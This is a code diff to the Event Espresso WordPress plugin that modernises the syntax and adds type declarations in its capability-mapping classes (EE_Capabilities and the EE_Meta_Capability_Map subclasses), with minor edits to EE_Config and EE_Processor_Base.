  */
 final class EE_Capabilities extends EE_Base
 {
-    const ROLE_ADMINISTRATOR = 'administrator';
+    const ROLE_ADMINISTRATOR        = 'administrator';
 
     const ROLE_EVENTS_ADMINISTRATOR = 'ee_events_administrator';
 
@@ -39,7 +39,7 @@ final class EE_Capabilities extends EE_Base
      *
      * @var array
      */
-    private $capabilities_map = array();
+    private $capabilities_map = [];
 
     /**
      * This used to hold an array of EE_Meta_Capability_Map objects
@@ -47,7 +47,7 @@ final class EE_Capabilities extends EE_Base
      *
      * @var EE_Meta_Capability_Map[]
      */
-    private $_meta_caps = array();
+    private $_meta_caps = [];
 
     /**
      * The internal $capabilities_map needs to be initialized before it can be used.
@@ -77,11 +77,11 @@ final class EE_Capabilities extends EE_Base
     /**
      * singleton method used to instantiate class object
      *
+     * @return EE_Capabilities
      * @since 4.5.0
      *
-     * @return EE_Capabilities
      */
-    public static function instance()
+    public static function instance(): EE_Capabilities
     {
         // check if instantiated, and if not do so.
         if (! self::$_instance instanceof EE_Capabilities) {
@@ -112,7 +112,7 @@ final class EE_Capabilities extends EE_Base
      * @return bool
      * @throws EE_Error
      */
-    public function init_caps($reset = false)
+    public function init_caps(?bool $reset = false): bool
     {
         if (! EE_Maintenance_Mode::instance()->models_can_query()) {
             return false;
@@ -120,8 +120,8 @@ final class EE_Capabilities extends EE_Base
         $this->reset = filter_var($reset, FILTER_VALIDATE_BOOLEAN);
         // if reset, then completely delete the cache option and clear the $capabilities_map property.
         if ($this->reset) {
-            $this->initialized = null;
-            $this->capabilities_map = array();
+            $this->initialized      = null;
+            $this->capabilities_map = [];
             delete_option(self::option_name);
         }
         if ($this->initialized === null) {
@@ -147,9 +147,9 @@ final class EE_Capabilities extends EE_Base
     /**
      * This sets the meta caps property.
      *
-     * @since 4.5.0
      * @return void
      * @throws EE_Error
+     * @since 4.5.0
      */
     private function _set_meta_caps()
     {
@@ -159,8 +159,8 @@ final class EE_Capabilities extends EE_Base
             $this->_get_default_meta_caps_array()
         );
         // add filter for map_meta_caps but only if models can query.
-        if (! has_filter('map_meta_cap', array($this, 'map_meta_caps'))) {
-            add_filter('map_meta_cap', array($this, 'map_meta_caps'), 10, 4);
+        if (! has_filter('map_meta_cap', [$this, 'map_meta_caps'])) {
+            add_filter('map_meta_cap', [$this, 'map_meta_caps'], 10, 4);
         }
     }
 
@@ -168,130 +168,130 @@ final class EE_Capabilities extends EE_Base
     /**
      * This builds and returns the default meta_caps array only once.
      *
-     * @since  4.8.28.rc.012
      * @return array
      * @throws EE_Error
+     * @since  4.8.28.rc.012
      */
-    private function _get_default_meta_caps_array()
+    private function _get_default_meta_caps_array(): array
     {
-        static $default_meta_caps = array();
+        static $default_meta_caps = [];
         // make sure we're only ever initializing the default _meta_caps array once if it's empty.
         if (empty($default_meta_caps)) {
-            $default_meta_caps = array(
+            $default_meta_caps = [
                 // edits
                 new EE_Meta_Capability_Map_Edit(
                     'ee_edit_event',
-                    array('Event', 'ee_edit_published_events', 'ee_edit_others_events', 'ee_edit_private_events')
+                    ['Event', 'ee_edit_published_events', 'ee_edit_others_events', 'ee_edit_private_events']
                 ),
                 new EE_Meta_Capability_Map_Edit(
                     'ee_edit_venue',
-                    array('Venue', 'ee_edit_published_venues', 'ee_edit_others_venues', 'ee_edit_private_venues')
+                    ['Venue', 'ee_edit_published_venues', 'ee_edit_others_venues', 'ee_edit_private_venues']
                 ),
                 new EE_Meta_Capability_Map_Edit(
                     'ee_edit_registration',
-                    array('Registration', '', 'ee_edit_others_registrations', '')
+                    ['Registration', '', 'ee_edit_others_registrations', '']
                 ),
                 new EE_Meta_Capability_Map_Edit(
                     'ee_edit_checkin',
-                    array('Registration', '', 'ee_edit_others_checkins', '')
+                    ['Registration', '', 'ee_edit_others_checkins', '']
                 ),
                 new EE_Meta_Capability_Map_Messages_Cap(
                     'ee_edit_message',
-                    array('Message_Template_Group', '', 'ee_edit_others_messages', 'ee_edit_global_messages')
+                    ['Message_Template_Group', '', 'ee_edit_others_messages', 'ee_edit_global_messages']
                 ),
                 new EE_Meta_Capability_Map_Edit(
                     'ee_edit_default_ticket',
-                    array('Ticket', '', 'ee_edit_others_default_tickets', '')
+                    ['Ticket', '', 'ee_edit_others_default_tickets', '']
                 ),
                 new EE_Meta_Capability_Map_Registration_Form_Cap(
                     'ee_edit_question',
-                    array('Question', '', '', 'ee_edit_system_questions')
+                    ['Question', '', '', 'ee_edit_system_questions']
                 ),
                 new EE_Meta_Capability_Map_Registration_Form_Cap(
                     'ee_edit_question_group',
-                    array('Question_Group', '', '', 'ee_edit_system_question_groups')
+                    ['Question_Group', '', '', 'ee_edit_system_question_groups']
                 ),
                 new EE_Meta_Capability_Map_Edit(
                     'ee_edit_payment_method',
-                    array('Payment_Method', '', 'ee_edit_others_payment_methods', '')
+                    ['Payment_Method', '', 'ee_edit_others_payment_methods', '']
                 ),
                 // reads
                 new EE_Meta_Capability_Map_Read(
                     'ee_read_event',
-                    array('Event', '', 'ee_read_others_events', 'ee_read_private_events')
+                    ['Event', '', 'ee_read_others_events', 'ee_read_private_events']
                 ),
                 new EE_Meta_Capability_Map_Read(
                     'ee_read_venue',
-                    array('Venue', '', 'ee_read_others_venues', 'ee_read_private_venues')
+                    ['Venue', '', 'ee_read_others_venues', 'ee_read_private_venues']
                 ),
                 new EE_Meta_Capability_Map_Read(
                     'ee_read_registration',
-                    array('Registration', '', 'ee_read_others_registrations', '')
+                    ['Registration', '', 'ee_read_others_registrations', '']
                 ),
                 new EE_Meta_Capability_Map_Read(
                     'ee_read_checkin',
-                    array('Registration', '', 'ee_read_others_checkins', '')
+                    ['Registration', '', 'ee_read_others_checkins', '']
                 ),
                 new EE_Meta_Capability_Map_Messages_Cap(
                     'ee_read_message',
-                    array('Message_Template_Group', '', 'ee_read_others_messages', 'ee_read_global_messages')
+                    ['Message_Template_Group', '', 'ee_read_others_messages', 'ee_read_global_messages']
                 ),
                 new EE_Meta_Capability_Map_Read(
                     'ee_read_default_ticket',
-                    array('Ticket', '', 'ee_read_others_default_tickets', '')
+                    ['Ticket', '', 'ee_read_others_default_tickets', '']
                 ),
                 new EE_Meta_Capability_Map_Read(
                     'ee_read_payment_method',
-                    array('Payment_Method', '', 'ee_read_others_payment_methods', '')
+                    ['Payment_Method', '', 'ee_read_others_payment_methods', '']
                 ),
                 // deletes
                 new EE_Meta_Capability_Map_Delete(
                     'ee_delete_event',
-                    array(
+                    [
                         'Event',
                         'ee_delete_published_events',
                         'ee_delete_others_events',
                         'ee_delete_private_events',
-                    )
+                    ]
                 ),
                 new EE_Meta_Capability_Map_Delete(
                     'ee_delete_venue',
-                    array(
+                    [
                         'Venue',
                         'ee_delete_published_venues',
                         'ee_delete_others_venues',
                         'ee_delete_private_venues',
-                    )
+                    ]
                 ),
                 new EE_Meta_Capability_Map_Delete(
                     'ee_delete_registration',
-                    array('Registration', '', 'ee_delete_others_registrations', '')
+                    ['Registration', '', 'ee_delete_others_registrations', '']
                 ),
                 new EE_Meta_Capability_Map_Delete(
                     'ee_delete_checkin',
-                    array('Registration', '', 'ee_delete_others_checkins', '')
+                    ['Registration', '', 'ee_delete_others_checkins', '']
                 ),
                 new EE_Meta_Capability_Map_Messages_Cap(
                     'ee_delete_message',
-                    array('Message_Template_Group', '', 'ee_delete_others_messages', 'ee_delete_global_messages')
+                    ['Message_Template_Group', '', 'ee_delete_others_messages', 'ee_delete_global_messages']
                 ),
                 new EE_Meta_Capability_Map_Delete(
                     'ee_delete_default_ticket',
-                    array('Ticket', '', 'ee_delete_others_default_tickets', '')
+                    ['Ticket', '', 'ee_delete_others_default_tickets', '']
                 ),
                 new EE_Meta_Capability_Map_Registration_Form_Cap(
                     'ee_delete_question',
-                    array('Question', '', '', 'delete_system_questions')
+                    ['Question', '', '', 'delete_system_questions']
                 ),
                 new EE_Meta_Capability_Map_Registration_Form_Cap(
                     'ee_delete_question_group',
-                    array('Question_Group', '', '', 'delete_system_question_groups')
+                    ['Question_Group', '', '', 'delete_system_question_groups']
                 ),
                 new EE_Meta_Capability_Map_Delete(
                     'ee_delete_payment_method',
-                    array('Payment_Method', '', 'ee_delete_others_payment_methods', '')
+                    ['Payment_Method', '', 'ee_delete_others_payment_methods', '']
                 ),
-            );
+            ];
         }
         return $default_meta_caps;
     }
@@ -303,17 +303,18 @@ final class EE_Capabilities extends EE_Base
      *
      * The actual logic is carried out by implementer classes in their definition of _map_meta_caps.
      *
-     * @since 4.5.0
-     * @see   wp-includes/capabilities.php
-     *
      * @param array  $caps    actual users capabilities
      * @param string $cap     initial capability name that is being checked (the "map" key)
      * @param int    $user_id The user id
      * @param array  $args    Adds context to the cap. Typically the object ID.
      * @return array actual users capabilities
      * @throws EE_Error
+     * @throws ReflectionException
+     * @since 4.5.0
+     * @see   wp-includes/capabilities.php
+     *
      */
-    public function map_meta_caps($caps, $cap, $user_id, $args)
+    public function map_meta_caps(array $caps, string $cap, int $user_id, array $args): array
     {
         if (did_action('AHEE__EE_System__load_espresso_addons__complete')) {
             // loop through our _meta_caps array
@@ -337,16 +338,16 @@ final class EE_Capabilities extends EE_Base
      * Note this array is filtered.
      * It is assumed that all available EE capabilities are assigned to the administrator role.
      *
+     * @return array
      * @since 4.5.0
      *
-     * @return array
      */
-    private function _init_caps_map()
+    private function _init_caps_map(): array
     {
         return apply_filters(
             'FHEE__EE_Capabilities__init_caps_map__caps',
-            array(
-                EE_Capabilities::ROLE_ADMINISTRATOR => array(
+            [
+                EE_Capabilities::ROLE_ADMINISTRATOR        => [
                     // basic access
                     'ee_read_ee',
                     // gateways
@@ -465,8 +466,8 @@ final class EE_Capabilities extends EE_Base
                     'ee_manage_event_types',
                     'ee_edit_event_type',
                     'ee_delete_event_type',
-                ),
-                EE_Capabilities::ROLE_EVENTS_ADMINISTRATOR => array(
+                ],
+                EE_Capabilities::ROLE_EVENTS_ADMINISTRATOR => [
                     // core wp caps
                     'read',
                     'read_private_pages',
@@ -611,8 +612,8 @@ final class EE_Capabilities extends EE_Base
                     'ee_manage_event_types',
                     'ee_edit_event_type',
                     'ee_delete_event_type',
-                ),
-            )
+                ],
+            ]
         );
     }
 
@@ -621,7 +622,7 @@ final class EE_Capabilities extends EE_Base
      * @return bool
      * @throws EE_Error
      */
-    private function setupCapabilitiesMap()
+    private function setupCapabilitiesMap(): bool
     {
         // if the initialization process hasn't even started, then we need to call init_caps()
         if ($this->initialized === null) {
@@ -630,7 +631,7 @@ final class EE_Capabilities extends EE_Base
         // unless resetting, get caps from db if we haven't already
         $this->capabilities_map = $this->reset || ! empty($this->capabilities_map)
             ? $this->capabilities_map
-            : get_option(self::option_name, array());
+            : get_option(self::option_name, []);
         return true;
     }
 
@@ -639,30 +640,30 @@ final class EE_Capabilities extends EE_Base
      * @param bool $update
      * @return bool
      */
-    private function updateCapabilitiesMap($update = true)
+    private function updateCapabilitiesMap(bool $update = true): bool
     {
-        return $update ? update_option(self::option_name, $this->capabilities_map) : false;
+        return $update && update_option(self::option_name, $this->capabilities_map);
     }
 
 
     /**
      * Adds capabilities to roles.
      *
-     * @since 4.9.42
      * @param array $capabilities_to_add array of capabilities to add, indexed by roles.
      *                                   Note that this should ONLY be called on activation hook
      *                                   otherwise the caps will be added on every request.
      * @return bool
-     * @throws \EE_Error
+     * @throws EE_Error
+     * @since 4.9.42
      */
-    public function addCaps(array $capabilities_to_add)
+    public function addCaps(array $capabilities_to_add): bool
     {
         // don't do anything if the capabilities map can not be initialized
         if (! $this->setupCapabilitiesMap()) {
             return false;
         }
         // and filter the array so others can get in on the fun during resets
-        $capabilities_to_add = apply_filters(
+        $capabilities_to_add     = apply_filters(
             'FHEE__EE_Capabilities__addCaps__capabilities_to_add',
             $capabilities_to_add,
             $this->reset,
@@ -695,9 +696,9 @@ final class EE_Capabilities extends EE_Base
      *
      * @param array $caps_map map of capabilities to be removed (indexed by roles)
      * @return bool
-     * @throws \EE_Error
+     * @throws EE_Error
      */
-    public function removeCaps($caps_map)
+    public function removeCaps(array $caps_map): bool
     {
         // don't do anything if the capabilities map can not be initialized
         if (! $this->setupCapabilitiesMap()) {
@@ -729,7 +730,7 @@ final class EE_Capabilities extends EE_Base
      *
      * @param bool $flush Default is to flush the WP_User object.  If false, then this method effectively does nothing.
      */
-    private function flushWpUser($flush = true)
+    private function flushWpUser(bool $flush = true)
     {
         if ($flush) {
             $user = wp_get_current_user();
@@ -745,20 +746,20 @@ final class EE_Capabilities extends EE_Base
      * specific to prevent the cap from being added on every page load (adding caps are persistent to the db). Note.
      * this is a wrapper for $wp_role->add_cap()
      *
-     * @see   wp-includes/capabilities.php
-     * @since 4.5.0
      * @param string|WP_Role $role  A WordPress role the capability is being added to
      * @param string         $cap   The capability being added to the role
      * @param bool           $grant Whether to grant access to this cap on this role.
      * @param bool           $update_capabilities_map
      * @return bool
-     * @throws \EE_Error
+     * @throws EE_Error
+     * @see   wp-includes/capabilities.php
+     * @since 4.5.0
      */
-    public function add_cap_to_role($role, $cap, $grant = true, $update_capabilities_map = true)
-    {
+    public function add_cap_to_role($role, string $cap, bool $grant = true, bool $update_capabilities_map = true):
+    bool {
         // capture incoming value for $role because we may need it to create a new WP_Role
         $orig_role = $role;
-        $role = $role instanceof WP_Role ? $role : get_role($role);
+        $role      = $role instanceof WP_Role ? $role : get_role($role);
         // if the role isn't available then we create it.
         if (! $role instanceof WP_Role) {
             // if a plugin wants to create a specific role name then they should create the role before
@@ -766,8 +767,8 @@ final class EE_Capabilities extends EE_Base
             // - removes any `ee_` namespacing from the start of the slug.
             // - replaces `_` with ` ` (empty space).
             // - sentence case on the resulting string.
-            $role_label = ucwords(str_replace(array('ee_', '_'), array('', ' '), $orig_role));
-            $role = add_role($orig_role, $role_label);
+            $role_label = ucwords(str_replace(['ee_', '_'], ['', ' '], $orig_role));
+            $role       = add_role($orig_role, $role_label);
         }
         if ($role instanceof WP_Role) {
             // don't do anything if the capabilities map can not be initialized
@@ -789,15 +790,15 @@ final class EE_Capabilities extends EE_Base
      * Functions similarly to add_cap_to_role except removes cap from given role.
      * Wrapper for $wp_role->remove_cap()
      *
-     * @see   wp-includes/capabilities.php
-     * @since 4.5.0
      * @param string|WP_Role $role A WordPress role the capability is being removed from.
      * @param string         $cap  The capability being removed
      * @param bool           $update_capabilities_map
      * @return bool
-     * @throws \EE_Error
+     * @throws EE_Error
+     * @since 4.5.0
+     * @see   wp-includes/capabilities.php
      */
-    public function remove_cap_from_role($role, $cap, $update_capabilities_map = true)
+    public function remove_cap_from_role($role, string $cap, bool $update_capabilities_map = true): bool
     {
         // don't do anything if the capabilities map can not be initialized
         if (! $this->setupCapabilitiesMap()) {
@@ -819,9 +820,9 @@ final class EE_Capabilities extends EE_Base
      * @param string $role_name
      * @param string $cap
      * @param bool   $get_index
-     * @return bool|mixed
+     * @return bool|int|string
      */
-    private function capHasBeenAddedToRole($role_name = '', $cap = '', $get_index = false)
+    private function capHasBeenAddedToRole(string $role_name = '', string $cap = '', bool $get_index = false)
     {
         if (
             isset($this->capabilities_map[ $role_name ])
@@ -840,16 +841,16 @@ final class EE_Capabilities extends EE_Base
      * write those filters wherever current_user_can is called).
      * 2. Explicit passing of $id from a given context ( useful in the cases of map_meta_cap filters )
      *
-     * @since 4.5.0
-     *
      * @param string $cap     The cap being checked.
      * @param string $context The context where the current_user_can is being called from.
      * @param int    $id      Optional. Id for item where current_user_can is being called from (used in map_meta_cap()
      *                        filters.
      *
      * @return bool  Whether user can or not.
+     * @since 4.5.0
+     *
      */
-    public function current_user_can($cap, $context, $id = 0)
+    public function current_user_can(string $cap, string $context, int $id = 0): bool
     {
         // apply filters (both a global on just the cap, and context specific.  Global overrides context specific)
         $filtered_cap = apply_filters('FHEE__EE_Capabilities__current_user_can__cap__' . $context, $cap, $id);
@@ -877,7 +878,7 @@ final class EE_Capabilities extends EE_Base
      *
      * @return bool Whether user can or not.
      */
-    public function user_can($user, $cap, $context, $id = 0)
+    public function user_can($user, string $cap, string $context, int $id = 0): bool
     {
         // apply filters (both a global on just the cap, and context specific.  Global overrides context specific)
         $filtered_cap = apply_filters('FHEE__EE_Capabilities__user_can__cap__' . $context, $cap, $user, $id);
@@ -902,8 +903,6 @@ final class EE_Capabilities extends EE_Base
      * write those filters wherever current_user_can is called).
      * 2. Explicit passing of $id from a given context ( useful in the cases of map_meta_cap filters )
      *
-     * @since 4.5.0
-     *
      * @param int    $blog_id The blog id that is being checked for.
      * @param string $cap     The cap being checked.
      * @param string $context The context where the current_user_can is being called from.
@@ -911,8 +910,10 @@ final class EE_Capabilities extends EE_Base
      *                        filters.
      *
      * @return bool  Whether user can or not.
+     * @since 4.5.0
+     *
      */
-    public function current_user_can_for_blog($blog_id, $cap, $context, $id = 0)
+    public function current_user_can_for_blog(int $blog_id, string $cap, string $context, int $id = 0): bool
     {
         $user_can = ! empty($id)
             ? current_user_can_for_blog($blog_id, $cap, $id)
@@ -925,7 +926,7 @@ final class EE_Capabilities extends EE_Base
             $cap,
             $id
         );
-        $user_can = apply_filters(
+        return apply_filters(
             'FHEE__EE_Capabilities__current_user_can_for_blog__user_can',
             $user_can,
             $context,
@@ -933,7 +934,6 @@ final class EE_Capabilities extends EE_Base
             $cap,
             $id
         );
-        return $user_can;
     }
 
 
@@ -959,7 +959,6 @@ final class EE_Capabilities extends EE_Base
 
 
     /**
-     * @deprecated 4.9.42
      * @param bool  $reset      If you need to reset Event Espresso's capabilities,
      *                          then please use the init_caps() method with the "$reset" parameter set to "true"
      * @param array $caps_map   Optional.
@@ -968,8 +967,9 @@ final class EE_Capabilities extends EE_Base
      *                          task otherwise the caps will be added on every request.
      * @return void
      * @throws EE_Error
+     * @deprecated 4.9.42
      */
-    public function init_role_caps($reset = false, $caps_map = array())
+    public function init_role_caps(bool $reset = false, array $caps_map = [])
     {
         // If this method is called directly and reset is set as 'true',
         // then display a doing it wrong notice, because we want resets to go through init_caps()
@@ -1018,18 +1018,16 @@ abstract class EE_Meta_Capability_Map
 
     protected $_model_name;
 
-    public $published_cap = '';
+    public    $published_cap = '';
 
-    public $others_cap = '';
+    public    $others_cap    = '';
 
-    public $private_cap = '';
+    public    $private_cap   = '';
 
 
     /**
      * constructor.
      * Receives the setup arguments for the map.
-     *
-     * @since                        4.5.0
      *
      * @param string $meta_cap   What meta capability is this mapping.
      * @param array  $map_values array {
@@ -1045,8 +1043,10 @@ abstract class EE_Meta_Capability_Map
      * @type         $map_values [3] string represents the capability used for private. Optional.
      *                               }
      * @throws EE_Error
+     * @since                        4.5.0
+     *
      */
-    public function __construct($meta_cap, $map_values)
+    public function __construct(string $meta_cap, array $map_values)
     {
         $this->meta_cap = $meta_cap;
         // verify there are four args in the $map_values array;
@@ -1062,29 +1062,30 @@ abstract class EE_Meta_Capability_Map
             );
         }
         // set properties
-        $this->_model = null;
-        $this->_model_name = $map_values[0];
+        $this->_model        = null;
+        $this->_model_name   = $map_values[0];
         $this->published_cap = (string) $map_values[1];
-        $this->others_cap = (string) $map_values[2];
-        $this->private_cap = (string) $map_values[3];
+        $this->others_cap    = (string) $map_values[2];
+        $this->private_cap   = (string) $map_values[3];
     }
+
 
     /**
      * Makes it so this object stops filtering caps
      */
     public function remove_filters()
     {
-        remove_filter('map_meta_cap', array($this, 'map_meta_caps'), 10);
+        remove_filter('map_meta_cap', [$this, 'map_meta_caps']);
     }
 
 
     /**
      * This method ensures that the $model property is converted from the model name string to a proper EEM_Base class
      *
-     * @since 4.5.0
-     * @throws EE_Error
-     *
      * @return void
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @since 4.5.0
      */
     public function ensure_is_model()
     {
@@ -1096,7 +1097,7 @@ abstract class EE_Meta_Capability_Map
         $this->_model_name = (string) $this->_model_name;
         // error proof if the name has EEM in it
         $this->_model_name = str_replace('EEM', '', $this->_model_name);
-        $this->_model = EE_Registry::instance()->load_model($this->_model_name);
+        $this->_model      = EE_Registry::instance()->load_model($this->_model_name);
         if (! $this->_model instanceof EEM_Base) {
             throw new EE_Error(
                 sprintf(
@@ -1114,19 +1115,19 @@ abstract class EE_Meta_Capability_Map
 
     /**
      *
-     * @see   EE_Meta_Capability_Map::_map_meta_caps() for docs on params.
-     * @since 4.6.x
-     *
      * @param $caps
      * @param $cap
      * @param $user_id
      * @param $args
      *
      * @return array
+     * @since 4.6.x
+     *
+     * @see   EE_Meta_Capability_Map::_map_meta_caps() for docs on params.
      */
-    public function map_meta_caps($caps, $cap, $user_id, $args)
+    public function map_meta_caps($caps, $cap, $user_id, $args): array
     {
-        return $this->_map_meta_caps($caps, $cap, $user_id, $args);
+        return $this->_map_meta_caps($caps, $cap, (int) $user_id, $args);
     }
 
 
@@ -1134,17 +1135,17 @@ abstract class EE_Meta_Capability_Map
      * This is the callback for the wp map_meta_caps() function which allows for ensuring certain caps that act as a
      * "meta" for other caps ( i.e. ee_edit_event is a meta for ee_edit_others_events ) work as expected.
      *
-     * @since 4.5.0
-     * @see   wp-includes/capabilities.php
-     *
      * @param array  $caps    actual users capabilities
      * @param string $cap     initial capability name that is being checked (the "map" key)
      * @param int    $user_id The user id
      * @param array  $args    Adds context to the cap. Typically the object ID.
      *
      * @return array   actual users capabilities
+     * @see   wp-includes/capabilities.php
+     *
+     * @since 4.5.0
      */
-    abstract protected function _map_meta_caps($caps, $cap, $user_id, $args);
+    abstract protected function _map_meta_caps(array $caps, string $cap, int $user_id, array $args): array;
 }
 
 
@@ -1163,17 +1164,19 @@ class EE_Meta_Capability_Map_Edit extends EE_Meta_Capability_Map
      * This is the callback for the wp map_meta_caps() function which allows for ensuring certain caps that act as a
      * "meta" for other caps ( i.e. ee_edit_event is a meta for ee_edit_others_events ) work as expected.
      *
-     * @since 4.5.0
-     * @see   wp-includes/capabilities.php
-     *
      * @param array  $caps    actual users capabilities
      * @param string $cap     initial capability name that is being checked (the "map" key)
      * @param int    $user_id The user id
      * @param array  $args    Adds context to the cap. Typically the object ID.
      *
      * @return array   actual users capabilities
+     * @throws EE_Error
+     * @throws EE_Error
+     * @since 4.5.0
+     * @see   wp-includes/capabilities.php
+     *
      */
-    protected function _map_meta_caps($caps, $cap, $user_id, $args)
+    protected function _map_meta_caps(array $caps, string $cap, int $user_id, array $args): array
     {
         // only process if we're checking our mapped_cap
         if ($cap !== $this->meta_cap) {
@@ -1184,9 +1187,6 @@ class EE_Meta_Capability_Map_Edit extends EE_Meta_Capability_Map
         if (($key = array_search($cap, $caps)) !== false) {
             unset($caps[ $key ]);
         }
-
-        // cast $user_id to int for later explicit comparisons
-        $user_id = (int) $user_id;
 
         /** @var EE_Base_Class $obj */
         $obj = ! empty($args[0]) ? $this->_model->get_one_by_ID($args[0]) : null;
@@ -1253,17 +1253,18 @@ class EE_Meta_Capability_Map_Delete extends EE_Meta_Capability_Map_Edit
      * This is the callback for the wp map_meta_caps() function which allows for ensuring certain caps that act as a
      * "meta" for other caps ( i.e. ee_edit_event is a meta for ee_edit_others_events ) work as expected.
      *
-     * @since 4.5.0
-     * @see   wp-includes/capabilities.php
-     *
      * @param array  $caps    actual users capabilities
      * @param string $cap     initial capability name that is being checked (the "map" key)
      * @param int    $user_id The user id
      * @param array  $args    Adds context to the cap. Typically the object ID.
      *
      * @return array   actual users capabilities
+     * @throws EE_Error
+     * @since 4.5.0
+     * @see   wp-includes/capabilities.php
+     *
      */
-    protected function _map_meta_caps($caps, $cap, $user_id, $args)
+    protected function _map_meta_caps(array $caps, string $cap, int $user_id, array $args): array
     {
         return parent::_map_meta_caps($caps, $cap, $user_id, $args);
     }
@@ -1285,17 +1286,19 @@ class EE_Meta_Capability_Map_Read extends EE_Meta_Capability_Map
      * This is the callback for the wp map_meta_caps() function which allows for ensuring certain caps that act as a
      * "meta" for other caps ( i.e. ee_edit_event is a meta for ee_edit_others_events ) work as expected.
      *
-     * @since 4.5.0
-     * @see   wp-includes/capabilities.php
-     *
      * @param array  $caps    actual users capabilities
      * @param string $cap     initial capability name that is being checked (the "map" key)
      * @param int    $user_id The user id
      * @param array  $args    Adds context to the cap. Typically the object ID.
      *
      * @return array   actual users capabilities
+     * @throws EE_Error
+     * @throws EE_Error
+     * @since 4.5.0
+     * @see   wp-includes/capabilities.php
+     *
      */
-    protected function _map_meta_caps($caps, $cap, $user_id, $args)
+    protected function _map_meta_caps(array $caps, string $cap, int $user_id, array $args): array
     {
         // only process if we're checking our mapped cap;
         if ($cap !== $this->meta_cap) {
@@ -1306,9 +1309,6 @@ class EE_Meta_Capability_Map_Read extends EE_Meta_Capability_Map
         if (($key = array_search($cap, $caps)) !== false) {
             unset($caps[ $key ]);
         }
-
-        // cast $user_id to int for later explicit comparisons
-        $user_id = (int) $user_id;
 
         $obj = ! empty($args[0]) ? $this->_model->get_one_by_ID($args[0]) : null;
         // if no obj then let's just do cap
@@ -1380,17 +1380,19 @@ class EE_Meta_Capability_Map_Messages_Cap extends EE_Meta_Capability_Map
      * This is the callback for the wp map_meta_caps() function which allows for ensuring certain caps that act as a
      * "meta" for other caps ( i.e. ee_edit_event is a meta for ee_edit_others_events ) work as expected.
      *
-     * @since 4.5.0
-     * @see   wp-includes/capabilities.php
-     *
      * @param array  $caps    actual users capabilities
      * @param string $cap     initial capability name that is being checked (the "map" key)
      * @param int    $user_id The user id
      * @param array  $args    Adds context to the cap. Typically the object ID.
      *
      * @return array   actual users capabilities
+     * @throws EE_Error
+     * @throws EE_Error
+     * @since 4.5.0
+     * @see   wp-includes/capabilities.php
+     *
      */
-    protected function _map_meta_caps($caps, $cap, $user_id, $args)
+    protected function _map_meta_caps(array $caps, string $cap, int $user_id, array $args): array
     {
         // only process if we're checking our mapped_cap
         if ($cap !== $this->meta_cap) {
@@ -1402,16 +1404,13 @@ class EE_Meta_Capability_Map_Messages_Cap extends EE_Meta_Capability_Map
             unset($caps[ $key ]);
         }
 
-        // cast $user_id to int for later explicit comparisons
-        $user_id = (int) $user_id;
-
         $obj = ! empty($args[0]) ? $this->_model->get_one_by_ID($args[0]) : null;
         // if no obj then let's just do cap
         if (! $obj instanceof EE_Message_Template_Group) {
             $caps[] = 'do_not_allow';
             return $caps;
         }
-        $caps[] = $cap . 's';
+        $caps[]    = $cap . 's';
         $is_global = $obj->is_global();
         if ($obj->wp_user() && $obj->wp_user() === $user_id) {
             if ($is_global) {
@@ -1445,15 +1444,17 @@ class EE_Meta_Capability_Map_Registration_Form_Cap extends EE_Meta_Capability_Ma
      * This is the callback for the wp map_meta_caps() function which allows for ensuring certain caps that act as a
      * "meta" for other caps ( i.e. ee_edit_event is a meta for ee_edit_others_events ) work as expected.
      *
-     * @since 4.5.0
-     * @see   wp-includes/capabilities.php
      * @param array  $caps    actual users capabilities
      * @param string $cap     initial capability name that is being checked (the "map" key)
      * @param int    $user_id The user id
      * @param array  $args    Adds context to the cap. Typically the object ID.
      * @return array   actual users capabilities
+     * @throws EE_Error
+     * @throws EE_Error
+     * @since 4.5.0
+     * @see   wp-includes/capabilities.php
      */
-    protected function _map_meta_caps($caps, $cap, $user_id, $args)
+    protected function _map_meta_caps(array $caps, string $cap, int $user_id, array $args): array
     {
         // only process if we're checking our mapped_cap
         if ($cap !== $this->meta_cap) {
@@ -1469,7 +1470,7 @@ class EE_Meta_Capability_Map_Registration_Form_Cap extends EE_Meta_Capability_Ma
             $caps[] = 'do_not_allow';
             return $caps;
         }
-        $caps[] = $cap . 's';
+        $caps[]    = $cap . 's';
         $is_system = $obj instanceof EE_Question_Group ? $obj->system_group() : false;
         $is_system = $obj instanceof EE_Question ? $obj->is_system_question() : $is_system;
         if ($is_system) {

--- a/core/EE_Config.core.php
+++ b/core/EE_Config.core.php
@@ -408,7 +408,7 @@ final class EE_Config implements ResettableInterface
      * @param        $old_value
      * @param        $value
      */
-    public function double_check_config_comparison($option = '', $old_value, $value)
+    public function double_check_config_comparison($option, $old_value, $value)
     {
         // make sure we're checking the ee config
         if ($option === EE_Config::OPTION_NAME) {

--- a/core/business/EE_Processor_Base.class.php
+++ b/core/business/EE_Processor_Base.class.php
@@ -3,13 +3,10 @@
 /**
  * Class EE_Processor_Base
  *
- * Description
- *
  * @package               Event Espresso
  * @subpackage            core
  * @author                Brent Christensen
  * @since                 4.6
- *
  */
 class EE_Processor_Base
 {
@@ -29,7 +26,7 @@ class EE_Processor_Base
 
 
     /**
-     * @param boolean $IPN
+     * @param bool|int|string|null $IPN
      */
     public static function set_IPN($IPN)
     {
@@ -40,7 +37,7 @@ class EE_Processor_Base
     /**
      * Allows external class (usually checkout) to set whether SPCO is being revisited by registrant or not.
      *
-     * @param bool $revisit
+     * @param bool|int|string|null $revisit
      * @return void
      */
     public function set_revisit($revisit = false)
@@ -54,7 +51,7 @@ class EE_Processor_Base
      *
      * @param string              $class
      * @param string              $func
-     * @param string              $line
+     * @param int|string              $line
      * @param EE_Transaction|null $transaction
      * @param array               $info
      * @param bool                $display_request
@@ -62,21 +59,21 @@ class EE_Processor_Base
      * @throws ReflectionException
      */
     protected function log(
-        $class = '',
-        $func = '',
+        string $class = '',
+        string $func = '',
         $line = '',
-        EE_Transaction $transaction = null,
-        $info = array(),
-        $display_request = false
+        ?EE_Transaction $transaction = null,
+        array $info = [],
+        bool $display_request = false
     ) {
         if (WP_DEBUG && false) {
             if ($transaction instanceof EE_Transaction) {
                 // don't serialize objects
                 $info = EEH_Debug_Tools::strip_objects($info);
                 if ($transaction->ID()) {
-                    $info['TXN_status'] = $transaction->status_ID();
+                    $info['TXN_status']    = $transaction->status_ID();
                     $info['TXN_reg_steps'] = $transaction->reg_steps();
-                    $index = 'EE_Transaction: ' . $transaction->ID();
+                    $index                 = 'EE_Transaction: ' . $transaction->ID();
                     EEH_Debug_Tools::log($class, $func, $line, $info, $display_request, $index);
                 }
             }

